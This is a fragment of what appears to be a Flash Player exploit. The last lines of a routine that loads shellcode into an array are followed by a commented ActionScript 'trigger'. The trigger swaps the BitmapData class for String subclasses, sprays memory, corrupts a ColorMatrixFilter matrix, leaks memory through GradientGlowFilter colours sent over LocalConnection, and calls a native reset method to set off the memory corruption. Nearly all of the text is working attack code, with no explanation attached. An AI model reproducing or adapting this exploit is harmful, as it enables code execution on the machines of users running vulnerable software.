784					param1[i][sh++] = Number(shellcodeObj[u]); 
785				}
786				i++;
787				sh = 1;
788			}
789		}
790
791	}
792}
793
794// Trigger's ActionScript
795
796/*
797
798// Action script...
799
800// [Action in Frame 1]
801var b = new flash.display.BitmapData(4, 7);
802var filt = new flash.filters.DisplacementMapFilter(b, new flash.geom.Point(1, 2), 1, 2, 3, 4);
803var b2 = new flash.display.BitmapData(256, 512);
804var filt2 = new flash.filters.DisplacementMapFilter(b2, new flash.geom.Point(1, 2), 1, 2, 3, 4);
805var colors = [16777215, 16711680, 16776960, 52479];
806var alphas = [0, 1, 1, 1];
807var ratios = [0, 63, 126, 255];
808var ggf = new flash.filters.GradientGlowFilter(0, 45, colors, alphas, ratios, 55, 55, 2.500000, 2, "outer", false);
809var cmf = new flash.filters.ColorMatrixFilter([]);
810MyString2.setCMF(cmf);
811MyString1.setGGF(ggf);
812flash.filters.ColorMatrixFilter.prototype.resetMe = _global.ASnative(2106, 302);
813zz = MyString1;
814flash.display.BitmapData = zz;
815arr = new Array();
816var i = 0;
817while (i < 8192)
818{
819	arr[i] = new Number(0);
820	++i;
821} // end while
822var i = 100;
823while (i < 8192)
824{
825	arr[i] = "qwerty";
826	i = i + 8;
827} // end while
828k = filt.mapBitmap;
829zz = MyString2;
830flash.display.BitmapData = zz;
831k = filt.mapBitmap;
832cmf_matrix = cmf.matrix;
833cmf_matrix[4] = 8192;
834cmf_matrix[15] = 12.080810;
835cmf.matrix = cmf_matrix;
836ggf_colors = ggf.colors;
837ggf_alphas = ggf.alphas;
838mem = new Array();
839var i = 0;
840while (i < ggf_alphas.length)
841{
842	ggf_alphas[i] = ggf_alphas[i] * 255;
843	++i;
844} // end while
845for (i = 0; i < ggf_colors.length; i++)
846{
847	mem[i] = ggf_colors[i] + ggf_alphas[i] * 16777216;
848} // end of for
849ggf.colors = colors;
850ggf.alphas = alphas;
851ggf.ratios = ratios;
852var lc = new LocalConnection();
853lc.send("toAS3", "as2loaded", mem); 
854zz = cmf;
855zz.resetMe("b", 1, 1, 1);
856
857
858class MyString1 extends String
859{
860	static var ggf;
861	function MyString(a,b)
862	{
863		super();
864	}
865	
866	static function setGGF(myggf)
867	{
868		ggf = myggf;
869	}
870	
871	static function getGGF()
872	{
873		return (MyString1.ggf);
874	}
875}
876
877class MyString2 extends String
878{
879	static var cmf;
880	function MyString2(a,b)
881	{
882		super();
883	}
884	
885	static function setCMF(mycmf)
886	{
887		cmf = mycmf;
888	}
889	
890	static function getCMF()
891	{
892		return (MyString2.cmf);
893	}
894}
895
896
897*/